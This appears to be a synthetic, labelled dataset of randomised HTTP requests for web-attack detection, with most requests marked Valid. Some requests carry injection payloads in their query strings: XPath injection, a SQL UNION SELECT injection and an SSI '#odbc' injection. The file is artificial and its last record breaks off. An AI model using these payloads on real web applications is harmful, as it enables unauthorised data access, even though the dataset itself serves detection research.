Authorization: NTLM MW9lcnJ0ZWxIaWtlYXZkd3NpM0V3dXQ3c2VhMm9lZmpuY2JC
Range: 8-,-762016
Referer: http://ageillai.uk/ohnrHa/e7shia/cdutrc/peesha/mnRd.aspx
TE: deflate,chunked,deflate;q=0.2
Trailer: Pragma
User-Agent: Mozilla/4.0 (compatible; MSIE 4.6; Linux i386; nnodkioThl; erjo)
UA-CPU: Sparc
UA-Disp: 6381,2438,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 303x667
Via: FTP/2.5 www.M0doamy.js
Transfer-Encoding: compress
Upgrade: tfDtgt/3.8, s7e/0.3
Warning: 453 223.46.17.60:88 "h3yresw" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 185732331097779
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 24552
Start - Id: 24825
class: Valid
GET /nt/tsZxPTbopdShkC/jesttcnnouIri4wok/3O5axY/m9tQ/iSl@O2B7qxn/itorano8Eden3tioyr/ap2oepsnh6i/steauiswomq/cmtGXZ6.mspx?tm=csedehcbBE&leog=4x7kMOVtv&yeTtotiee8S=dh0bseadgzoart&ehtfaae1tf=Ehm&5efan=Ut%5D6&ahrse=+hgteom%7EidD HTTP/1.0
Host: www.se9F.st:53347
Connection: rnoe
Accept: */*
Accept-Charset: windows-1253;q=0.3, x-mac-ce;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=5
Client-ip: 63.224.181.72
Cookie: otlo=61216815;FIcn=nseoca;rmUK5M1=DmumnuhttpIndsoeqi;etdm2dtdtposrs=sCzqVX0KaOjM;-pkQVbinphpRhservicesX=f3JFBwk
Cookie2: $Version="951"
Date: Sat, 10 Jan 04 03:32:59 UTC
ETag: W/"WPZIjKrEjvLm0ecB"
Expect: 100-continue
From: pg0kwiy@2weD8er.de
If-Modified-Since: Sun, 13 Nov 05 19:59:29 GMT
If-Unmodified-Since: Tue, 19 Dec 06 19:25:22 CET
If-Match: *
If-None-Match: "D0aB7PqN31Ii95k"
If-Range: "3y1_Q.u5ugbWGJG14"
Max-Forwards: 6
MIME-Version: 0.0
Pragma: ho=huviiEn
Proxy-Authorization: eavp 4smsS=trdyaIt
Authorization: Basic SEVldHV2ZTp5ZnNuZXc=
Range: 89-,-8
Referer: http://n7fle.ch/tboizl/7fnaae/EdrDhin/Msmt.tiff
TE: chunked;q=0.0,chunked;q=0.1
Trailer: Expect
User-Agent: Mozilla/9.9 (Windows; U; Win98 1.0; et-al; rv:1.8.5) Gecko/00243900
UA-CPU: x86
UA-Disp: 9323,238,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 577x412
Via: 4.7 www.mfso.js:614, FTP/3.5 217.212.26.66:715
Transfer-Encoding: compress
Upgrade: slnd/7.7, n2now4/3.0, 8Sk/4.7, tIrah8/3.8, Nnodwe/5.3
Warning: 185 www.aas8co.jpeg:420 "Njalea" 
X-Forwarded-For: 21.89.90.200
X-Serial-Number: 2608938544154146397
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24825
Start - Id: 12332
class: Valid
GET /uRZGZQ2xrBwy@t/NYGLbswgetX4@aKp/2oPlS4@PZ_2pn7/rsE/autoexecqnQGnPXa/e0teirOnempnedeagsf/1ZlgwJ3yEtPdHAX/p-CcA8j/renhmtctlapirdGlsa.png?ednsansueN=852&Oi=+jnpshuaj&pxHd=+%25&Ezasmnn=id%3A&nnph1nstheH0sp6=6000&loasefsnwaroqo=wg8v&dser=91468&rneai=bEeb7teeuErd&7hlr=hinelld+ei4pe&IQovIhomeKiPs=6206 HTTP/1.1
Host: www.o7js.gov:810
Connection: close
Accept: */*;q=0.3
Accept-Charset: big5, x-mac-ce, cp-932;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: xuod-0fr
Cache-Control: max-stale
Client-ip: 120.80.21.176
Cookie: mlLlhXriWauarne=leCw3
Cookie2: $Version="899"
Date: Tue, 02 Dec 08 23:50:58 GMT
ETag: "N_P0O0DcZX7PZ08"
Expect: t9oi8f2=dctdtist
From: atRwrmd@teke.it
If-Modified-Since: Sat, 25 Jun 05 04:30:42 UTC
If-Unmodified-Since: Sun, 26 Jul 09 08:28:09 CET
If-Match: *
If-None-Match: "XoKyaZK._ISIvsEn82"
If-Range: *
Max-Forwards: 35
MIME-Version: 2.7
Pragma: asm='3p6a'
Proxy-Authorization: eitfn ddWoshr1=obTeG
Authorization: Digest nc=FDb5B94c
Range: 662-4,8147-,483669-546
Referer: /1lr0e/slRmsmoy/iacfrt/r7nl/8sageh.tiff
TE: gzip,trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.4 (X11; U; Linux i586 4.3; wg-Nt; rv:3.0.1) Gecko/88059675
UA-CPU: Sparc
UA-Disp: 5821,502,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9575x9608
Via: FTP/8.9 www.p5eSet.png, 2.8 www.iheere.jpeg:1516
Transfer-Encoding: identity
Upgrade: got9/5.0
Warning: 258 141.130.237.37 "ioreaseroE" "Tue, 27 Sep 05 18:21:28 UTC"
X-Forwarded-For: 111.220.164.212
X-Serial-Number: 7580317
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12332
Start - Id: 48869
class: XPathInjection
GET /m@i.php4?tizdtodia8eEa=7980572&rVstIEnr=d_-1AdoIkWwB&bO8ornstahsas=pacz9irsnd&oni2et=twwgroup+by&4l=edRief&lAst5f3ptascd3=eLtdh%27++++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+++++%27rD%27++%3D+++%27&codu2snionaa=ycsc%25poichildezimgl%24&edathno=Abinn&N1fayD2twAree=s&rtxetsrncrXhaN=3178&aaugt2ea=sJddbQfpWy&netaans=sib5hki8qe HTTP/1.1
Host: www.w9se8h3n0.biz:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 81.197.139.145
Cookie: aeabnCatuni=152634;eoiuws8i=Ego;ZmochahHx=rhlseblireimgyrcs;tOrleltcaasosb=317
Cookie2: $Version="570"
Date: Fri, 26 Oct 07 13:33:38 GMT
ETag: "_fRV_D@7oKn-qsK"
Expect: dn6t
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Mon, 06 Nov 06 09:09:06 CET
If-Unmodified-Since: Mon, 05 Feb 07 08:31:40 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1138
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic aHdmYTY6RXk3aw==
Authorization: NTLM cWViYm9OZWJaaHR3cm9hZW5yeXNBaGR1aEVFbnVlbm50aXQyYjNzcm5lYXRmcw==
Range: 03033-94733
Referer: /oks9r.cgi
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: nUif._ http://www.cifmrnee.uk
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: HTTP/3.5 www.bgipl.css, 1.8 www.qIiie.gif:5476, 6.4 www.ctooTsls.css
Transfer-Encoding: compress
Upgrade: cntr/0.2, fRir/4.0, qalsS/7.9
Warning: 954 www.ilczoa.gif:1 "ja32a5uE" 
X-Forwarded-For: 156.103.50.172
X-Serial-Number: 043440
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48869
Start - Id: 41807
class: SqlInjection
GET /Ad0wnsfs/ye@oUscriptI/lA-X7HsNE/yUDenAV/cHsj1/gRA3EqSwCUm/deho0/yeaCdeeR.aspx?ne9=0lsot&Bleyu=6ahnU3G6wpy0&u4e9Ph3u=2&ctteahNq=1&er39zo9pcawe=%27++%29++UNION+ALL++++SELECT++++8461%2C377%2C81%2C8%2C37+FROM+++++fnsGti+++WHERE++%28%27%27++++%3D++++%27&uecca5oau=fTj HTTP/1.0
Host: www.sseudt.st
Connection: close
Accept: image/gif, application/postscript;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: l5ehW2ae-ninraSre, imsaU-lseetne;q=0.0, jrasnaeo-aon6e;q=0.1, oOel-r5t1e, l-ehzUp
Cache-Control: min-fresh=345
Client-ip: 175.74.180.28
Cookie: UeoEOautda=14;dlmn8obDm=eenorileentnhh3Nm;689YvRH6U2Z3=364407;odrEdn8eri1at=w f6a
Cookie2: $Version="94"
Date: Sun, 17 Sep 06 18:05:18 CET
ETag: W/"B9vez_6N2C2hWas2l"
Expect: 100-continue
From: ame9p@neehptrbo.fr
If-Modified-Since: Thu, 30 Jul 09 02:26:45 GMT
If-Unmodified-Since: Thu, 19 Nov 09 01:50:50 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Mar 09 02:38:58 CET
Max-Forwards: 5
MIME-Version: 8.0
Pragma: nner0e=nccidys
Proxy-Authorization: dgDa4v rdekp=aenneN
Authorization: Basic Y0V0TzpyTmM4UmY=
Range: 340098-821
Referer: /Lfg6esn/hmdeo/tssby.png
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.5 (Windows; U; Windows NT 9.9; gi-nl; rv:1.0.8) Gecko/95207384
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7095x5636
Via: 4.7 0.69.197.174, 6.1 www.nmnt.jpeg
Transfer-Encoding: gzip
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 706 www.bha5ea.gif "rttdDznEnnn" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 34361564811
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41807
Start - Id: 26602
class: Valid
GET /rrisCi7EAi1ia/r6uU3Y@fgio455C/lohYn952qQbYx@t/lHdc/nvEcw7a4VbFgGW1e/oAna/m8BJnD-vEl69/iolclM.php4?b3QOvbscriptE=wwnowaeta6Isg&IozhE=r7hsleecge4%3En&tdkbtneEt4eTe=52&cA=%5Dhpl&entciaa7eyim1=tbs+&chie6Ooiot=kch0ea%3C&s7=0444&qshTtTm0ToseW=63986458&tsn=eK-ltjlaHdb&Dp0ekaealo=1241476157 HTTP/1.0
Host: www.taito.biz
Connection: close
Accept: text/xml;q=0.9, audio/*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: dob-rae;q=0.9
Cache-Control: max-stale
Client-ip: 90.106.221.80
Cookie: X5JCRb=38659;4kBgfr7.K=Mhaving
Cookie2: $Version="720"
Date: Tue, 23 Feb 10 22:55:24 CET
ETag: "A2PVz2tWvqb6Caad7h"
Expect: 100-continue
From: aucneam2@riewaCaudy.st
If-Modified-Since: Sat, 27 Jan 07 18:32:52 CET
If-Unmodified-Since: Tue, 22 Jul 08 22:13:17 UTC
If-Match: "tPGnquv57gp_ZOjT"
If-None-Match: *
If-Range: Mon, 28 Sep 09 06:37:03 UTC
Max-Forwards: 65
MIME-Version: 6.3
Pragma: 0a='axri'
Proxy-Authorization: Basic ZWFzcmZUczY6YmlkaXc=
Authorization: Basic dHhJbmFNOmNobm9EMw==
Range: 265-54174,0620-,-72
Referer: /trmp/owrce/jrIis/nstlrwdE.pl
TE: deflate;q=0.4
Trailer: Referer
User-Agent: Mozilla/8.6 (X11; U; Open BSD i386 4.2; sc-7t; rv:0.5.9) Gecko/99922276
UA-CPU: Sparc
UA-Disp: 7024,486,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 190x433
Via: 7.4 www.ifeRdwd.htm:0248, 2.8 181.253.157.56:321, 7.1 www.hnst.html:37
Transfer-Encoding: gzip
Upgrade: Tenye/5.9, aLi/6.4
Warning: 774 www.tz3st.png "ijTrtts9" "Mon, 01 Sep 08 04:45:14 CET"
X-Forwarded-For: 220.222.195.180
X-Serial-Number: 693373977262
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26602
Start - Id: 17508
class: Valid
GET /nta/7gS2/bvlnmy/bafyaeabon/aflEWT/rAd4_4TC4OBiN10dkP.css?a7t=eher5aohrow2e&nina4e93iahrskt=s+ihoa+m%3AhiMevi%3Be&ia=rEoi%3Einclude+nwh%5Buy%26TIDor&XoaeO0o2eh=iyttSow&9e=ceuiSt&hintutofhms4=57238365&e09eh=7324430&arAssdsofe=0209118698&edtc8e8T3eA=locationreplace&on4=72211726&3ema=9206890&ensseA72old=el04sGgiloop&EEa5oaed=t%3Cr&AuhatpHli=u2gm2nzmFwhh&JuAdropl=83332610 HTTP/1.0
Host: 60.165.194.235
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-1;q=0.2
Accept-Encoding: compress;q=0.9, gzip, gzip;q=0.1
Accept-Language: *
Cache-Control: oTmsde0='nte'
Client-ip: 252.240.14.144
Cookie: 1rnTdo=gLY_Kng
Cookie2: $Version="132"
Date: Wed, 07 Nov 07 16:13:57 UTC
ETag: "VfDQeglA-OWCeNU4sa"
Expect: 100-continue
From: ettaoe@hoaeEoNn5.it
If-Modified-Since: Fri, 29 Aug 08 16:12:33 CET
If-Unmodified-Since: Sun, 12 Mar 06 07:53:09 GMT
If-Match: *
If-None-Match: "KSwCCU0v_Lsi4.V"
If-Range: Tue, 21 Apr 09 04:33:46 UTC
Max-Forwards: 8757
MIME-Version: 5.7
Pragma: yee=ne
Proxy-Authorization: Basic YTFubDpleTFzbnVl
Authorization: Basic aHpkYnZlOkVzYWU0
Range: 8940-,0923-,5121-
Referer: http://ecnly.com/yraoipnn.txt
TE: trailers,deflate,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.9 (Machintosh; U; Mac OS X 8.4; ns-ac; rv:3.5.2) Gecko/68985971
UA-CPU: x86
UA-Disp: 646,6617,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6336x8003
Via: 9.5 178.247.106.96, FTP/6.2 www.tNievO.png
Transfer-Encoding: identity
Upgrade: wys/9.8, dwn/4.4
Warning: 373 146.38.237.78 "npfieGe" 
X-Forwarded-For: 152.234.23.25
X-Serial-Number: 677288661240188705
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17508
Start - Id: 5143
class: Valid
PUT /9ocILaeOevt8pwmofeg/n3aiGewOecoexEa/a@L7p44.SWt9X@G-5F@H.php? HTTP/1.1
Content-Length: 38
Content-Language: rnets,eslecgsr,6uiE
Content-Encoding: gzip
Content-Location: http://inyi.biz/u0tak7tn/ocxD/8maAtps/w9nsn.msf
Content-MD5: SW10aWQ5dUlzc3JkY3RtcA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 Sep 08 09:57:31 UTC
Last-Modified: Mon, 27 Oct 08 07:35:46 CET
Host: 84.84.51.194:67
Connection: abad0yit
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: hcQryu-eTIel
Cache-Control: max-age=4397
Client-ip: 107.205.220.83
Cookie: niqa07=/nee
Cookie2: $Version="7"
Date: Sun, 18 Apr 04 17:53:00 UTC
ETag: W/"BJ0opJqGV6GVC@L1DEVr"
Expect: 100-continue
From: daodwiso@rGHdclsrni.org
If-Modified-Since: Wed, 27 Apr 05 18:25:12 CET
If-Unmodified-Since: Wed, 29 Mar 06 08:27:37 CET
If-Match: "zjMTRPLjiGA1LwrNIl"
If-None-Match: "H4XanErrEbe2VsHELUh"
If-Range: Sun, 06 Aug 06 07:26:50 UTC
Max-Forwards: 55
MIME-Version: 5.3
Pragma: s3uWuo5y='hohs'
Proxy-Authorization: eNsit aneo7=ietstf
Authorization: NTLM ZU5kc3Ryb2VkVGJpenllM2c3ZTNsYWEyZjhMZWxpY3VnZXJuOWE5Yg==
Range: 851253-34094,-44,88-5
Referer: /t2aatote/owtqb/9chi/n93biTrL/u0ixOttl.nsf
TE: deflate;q=0.1,deflate;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: dn_tWDh http://www.Acs0etlA.fr
UA-CPU: MIPS
UA-Disp: 279,387,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9541x8110
Via: 1.9 www.rlt3.js, 4.5 216.171.243.49, 0.4 239.208.184.50:2
Transfer-Encoding: gzip
Upgrade: ewi/8.9, 39M/5.7
Warning: 083 129.138.26.225:279 "eecehtulictwrni" 
X-Forwarded-For: 199.181.19.164
X-Serial-Number: 64870443961077
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CFu6H=ycdtedecdaehmt3l&iBYhU2=n3m-0-uU

End - Id: 5143
Start - Id: 28734
class: Valid
GET /ojnxorfee/oOriwAHlTmXi5RR1VH/LfRm%uL9bbR/0tbMmZar-p/43m6DpznN-t/rNYN4_BRG4r6JqKtcP/eRIoetQ3JmYsB/2omdevesnsi1N/e0EerualiiFnbir5/diFQ_0VL.oN/EceGes4qYahresxi6i8h.pl?m7lmar=tte2tgutira&2esy4mmiwss=icloeehewt&siser1Tedg=%7C+&ehfWats8ptv=6035&insaEtda4oeuY=cK%40bim&iQJk4=273&9MHBpallpah7=u&h-TxVhtpassu8fZ=29290&UbrIF3J=dLhwetcps%24&TTrw5e6v1n=4818&btp7ehoAY=xcreplace%25leg%24&3kpsale=gAtatiannqi&QDfposition1=vTDx HTTP/1.1
Host: www.9Eye2en.st
Connection: keep-alive
Accept: video/*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: Ljsch-ihY0lo, gEcqe-Ecsdim;q=0.2, u-ie;q=0.7, 9-acpu, coeO5-lhehu
Cache-Control: max-age=41
Client-ip: 170.172.48.173
Cookie: Vohoerh=7160679;1itHHnmwnobatrt=m0metas;sdturlb=0566162942;ZaSYVQBSE2=lhsumdtamFn;xzUC-=a?qen>gdqNmochaEs
Cookie2: $Version="3"
Date: Fri, 12 Jun 09 21:41:12 GMT
ETag: W/"._uVi_rDyxI380G"
Expect: zd8elms
From: cmNaehb@twerq2.gov
If-Modified-Since: Thu, 15 Apr 10 03:53:28 UTC
If-Unmodified-Since: Mon, 09 Mar 09 01:38:49 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 09 Jul 05 07:45:05 CET
Max-Forwards: 766
MIME-Version: 0.0
Pragma: ee=o
Proxy-Authorization: Digest nonce
Authorization: Basic cmg5ZkF1ajpjYWFlb2lU
Range: 10-84444,513066-364
Referer: /rinh2q/leAtneli/afeaapm.swf
TE: chunked,gzip,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.3 (Windows; U; Win98 5.6; kr-hy; rv:0.5.1) Gecko/21473860
UA-CPU: StrongARM
UA-Disp: 5312,7568,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 621x541
Via: 8.8 www.vnidndc.html, 4yq0/4.9 www.theroi.tiff:7637
Transfer-Encoding: compress
Upgrade: EeX/0.3, uAg/6.3, nind/4.1, aeaaEi/8.5
Warning: 641 www.lsaHatx.html "tfmibtapeesks4ti" "Thu, 25 Mar 04 07:54:34 UTC"
X-Forwarded-For: 41.255.95.49
X-Serial-Number: 840252996378195680
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 28734
Start - Id: 10136
class: Valid
GET /antngu/6cbNo/FjitrhtttwslnrhO6.mdb? HTTP/1.1
Host: www.dhiozi.org
Connection: close
Accept: */*
Accept-Charset: iso-8859-15, iso-8859-6, big5
Accept-Encoding: 
Accept-Language: ea-hil0l;q=0.9, 8eEmtd0e-aa;q=0.0, m7xkstE-6ef
Cache-Control: min-fresh=5
Client-ip: 42.207.99.95
Cookie: tiaiwXeehYnhaCh=e
Cookie2: $Version="9"
Date: Thu, 25 Jan 07 12:43:56 CET
ETag: "0dUBZExBvPX79GAa"
Expect: jpgrt=9vdtd;nsh5uen=mOEto
From: tooao@trne6cted.it
If-Modified-Since: Wed, 26 Aug 09 03:50:59 CET
If-Unmodified-Since: Wed, 30 Jan 08 09:20:52 CET
If-Match: *
If-None-Match: "vdxNEsMSfJfyUJKC"
If-Range: Sat, 28 Aug 04 07:45:35 GMT
Max-Forwards: 6743
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: irimMo rnefpib=0rSnos
Authorization: Basic bm84NkthdDpvbmdz
Range: 374825-,-184
Referer: http://www.gbyNsCa.de/o7ui/niin/ssndEN/tre8.png
TE: trailers
Trailer: Date
User-Agent: uoaweatcaexhtgdrrnms
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 012x3228
Via: a6ma/5.0 126.55.10.204:6, HTTP/4.4 18.3.231.91
Transfer-Encoding: identity
Upgrade: gAp/2.1
Warning: 532 www.shkroer.shtml:1701 "enin" "Sat, 30 Apr 05 12:33:33 UTC"
X-Forwarded-For: 175.87.104.128
X-Serial-Number: 42090054187399989
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10136
Start - Id: 40937
class: SSI
GET /y_Zy8ZwaTWmSVeWV/gGHN9TRshutdownCbl.aspx?rihe=iBzK1Q-M_kku&hk1awee=%3C%21--+%23odbc+statement+%3D%22select++T5%2C++tpo%2C+++aneo++++from++++0aah9hgaem++order+++++by++++6%2C++++403%2C+5%22+++++--%3E HTTP/1.0
Host: www.st1g.gov
Connection: htL3er
Accept: image/*;q=0.3, application/x-tar
Accept-Encoding: 
Cache-Control: only-if-cached
Cookie: Dpaeimut=coh;kMFJnullZT0.kZ1=ogcakcod6iti;setllfsAeht=dt0.cI;4iok59d=zht;wzoaV=l
Cookie2: $Version="722"
Date: Wed, 19 Dec 07 05:59:48 CET
Max-Forwards: 7724
Authorization: NTLM aXRzbG5jb2dibGVvc09hcGlpamVsYWJ0ZWVhanBlaGFl
Referer: /heTht2y/nevapsn/lo1r5s.png
TE: deflate;q=0.8,trailers,trailers
User-Agent: Mozilla/7.2 (X11; U; Open BSD i386 7.3; eM-uo; rv:0.7.5) Gecko/02315584
UA-Color: color32
Transfer-Encoding: sehy; dkx6BP=bcBei6
----: ----------

null

End - Id: 40937
Start - Id: 25630
class: Valid
GET /eoFdgqWbBobSv5Xb@125/nscztilsWeqlantrhncd/J2.tiff?nTwAkHnode=11569&dah4sbrsjLeu4=52546&s6=yNmoa&te=1&tee2ht5=01260598&hEtCpgshe=otsaa&Kd0.H=anol0ld HTTP/1.1
Host: 216.97.84.106
Connection: TlqiOfg
Accept: text/*, video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: wr5stnrt-gc4eakoe;q=0.0, aau2ho-tmts
Cache-Control: min-fresh=3185
Client-ip: 86.20.85.20
Cookie: aslfn9e=c)Uj;osOkogi=10
Cookie2: $Version="92"
Date: Thu, 26 Jul 07 18:18:25 CET
ETag: "hUNDTa.53Sb7SEZ."
Expect: omtepps=edidto
From: ma49@uare.ch
If-Modified-Since: Fri, 12 Feb 10 04:54:55 UTC
If-Unmodified-Since: Mon, 05 Feb 07 04:31:25 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 08 Jul 08 01:08:57 CET
Max-Forwards: 846
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest uri=/a7dsnze/yaees.gif
Range: 737-,-72478
Referer: /i5tEWeg/3tsg00fi/hSedk.nsf
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: ntiwcIaoii5aa
UA-CPU: x86
UA-Disp: 8439,526,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0216x076
Via: 6.0 5.31.204.28, HTTP/7.0 www.skt1a.png:514
Transfer-Encoding: compress
Upgrade: trns/3.6, set/1.1
Warning: 386 98.228.32.141 "dehnl" 
X-Forwarded-For: 103.157.38.55
X-Serial-Number: 33104741
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 25630
Start - Id: 25622
class: Valid
GET /0fYjsoFqauD6Bd/dlwNeiiEIdlr/ynZ1vzv8O0GekelykI6z/oiuyr0yGntjsn1tQoe/lmedenneyxitIleha6/from-Ff6Zn-GXbN15l.nsf?tcuDhpnxoN=NzYcnts&xogtco=39974&iedteeAea=4 HTTP/1.1
Host: 146.149.224.105
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 86.20.85.20
Cookie: oo=185977496;icstd=pRTqG6uwe;vbscriptupdateI9uaPSnph-0=8157375183;xe8yjrl=ne/ys
Cookie2: $Version="92"
Date: Sat, 26 Jul 08 24:37:46 CET
ETag: "40qbs8cJE5VsXz7fNPK"
Expect: 100-continue
From: 0hi6jdg@0eiMas.net
If-Modified-Since: Thu, 23 Jun 05 03:46:19 UTC
If-Unmodified-Since: Tue, 24 Jul 07 16:07:33 GMT
If-Match: *
If-None-Match: *
If-Range: "Yj-RCZJ1hwZv.hmFlLn"
Max-Forwards: 8
MIME-Version: 6.8
Pragma: 3ojeg=kq2sat
Proxy-Authorization: Digest nonce
Authorization: NTLM ZWVyZm5saWVoaW9qb2FpZWhTbnNwcHlaaGROcnJ0ZXFvbXRubkVsenRNcXNlcw==
Range: -1684
Referer: http://eorhgTl.uk/zede/vlcfRe/7Me6i/crrrns9/swM2n.jpeg
TE: gzip;q=0.5
Trailer: Max-Forwards
User-Agent: rnps3koealibm2
UA-CPU: x86
UA-Disp: 8439,526,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0216x076
Via: oha5v/4.2 105.22.67.60, y4o3T/9.2 www.deol.jpeg
Transfer-Encoding: smtt; pttw4aiA=rzndealt
Upgrade: j2sy/1.0, eHioTt/6.1, ellr/5.1, dd6/7.1
Warning: 386 98.228.32.141 "dehnl" 
X-Forwarded-For: 103.157.38.55
X-Serial-Number: 400505966006
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25622
Start - Id: 31293
class: Valid
GET /4AKDeY4bin/Kiaf1xudc6.sh?nttaoAghceViT=vselectk&ee=nei&xeTeorzg=714190577&s9rBso=ftpEl+7ttwelocatione&xefHnduTe=aY%40Ae&aln=iatlr4eb%27wm&aer4euen=cnbseoaPsrmn3n&itpq=uFpk2BfhR&sutd4Meaet=oSBH5PEsFI_S&gbqabn9e=0t1d&lLGkYHGsPX=istdytlQh_cQ&taei8ct0tenyn=Hcl&dEnoe=nnAeee HTTP/1.0
Host: 221.95.147.210:5
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.5
Accept-Language: re-wh;q=0.0, Dmeywsp-aawc;q=0.7, n3tj-u, ynChi-oSw, w4flm3ra-ieouaVEg;q=0.0
Cache-Control: no-store
Client-ip: 0.152.80.254
Cookie: eeexiurfs9a7t=s6dnodeeaa;retnepeuzT=ieki;uldeve3ihta7q9=tidef84;iaee0=l=8kcdHunlis
Cookie2: $Version="6"
Date: Sat, 19 May 07 10:22:37 GMT
ETag: "y8hQ9nipAvRJNUl5.I"
Expect: r4nne4el
From: Jaodie@trvhtsHeY.ch
If-Modified-Since: Tue, 03 Nov 09 20:58:10 CET
If-Unmodified-Since: Thu, 30 Dec 04 04:31:22 UTC
If-Match: "hq8CQatcPDLNf46.oY"
If-None-Match: *
If-Range: Sat, 02 Dec 06 17:26:31 CET
Max-Forwards: 3340
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: 1mq4ne fds1seaN=tht6rnn
Range: -388719
Referer: /mxuap/PoeB/s3dO.wmn
TE: trailers,trailers
Trailer: If-Range
User-Agent: ioydcgudn (tzGLWv3)
UA-CPU: 68000
UA-Disp: 5325,2370,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3795x126
Via: ded/2.7 www.sNsoe.gif
Transfer-Encoding: compress
Upgrade: GorsU/6.8
Warning: 321 www.eor2Lmo.js "uenlgbdrgd" "Thu, 25 Sep 08 14:31:46 CET"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 27483217
----: --------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31293
Start - Id: 17593
class: Valid
GET /coaxr3goHndt/lpfl/sFRS.a91dRunlNTg/RexecAsock_stream/sFu2pcRb4.V5NDOl/l4hnuNel4rpiz8ot0me/ruhEmOlloca/sBton.swf?lC=eHI&H7Y8@D=15&e0vc7=4%3E&FK9ozKaOTH0l=26&9CDn7oegxiiR=tTXTfxa2AkH HTTP/1.1
Host: 39.155.174.253:101
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-2022-kr;q=0.4, iso-8859-9;q=0.4, cp-950;q=0.7, iso-8859-5, x-mac-ce
Accept-Encoding: identity, deflate;q=0.2, deflate;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 42.204.23.163
Cookie: 22nhreii=4483433;tls=leliG;yanR=nPF;9rds5e=8dp;_TTgCainputDXF=ichTtFG
Cookie2: $Version="35"
Date: Sat, 27 May 06 10:25:06 CET
ETag: W/"xD3pFCpxQ2HUw_rqcv-"
Expect: hLwe0l
From: e2mynsaw@nysLe.org
If-Modified-Since: Wed, 06 Jul 05 18:26:15 UTC
If-Unmodified-Since: Sat, 31 Oct 09 23:30:23 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM aWltYWZ2cmlpcmljZm1haTJuNjF0OW5zb2VlaWVlbmFkdnNvSG5uRGls
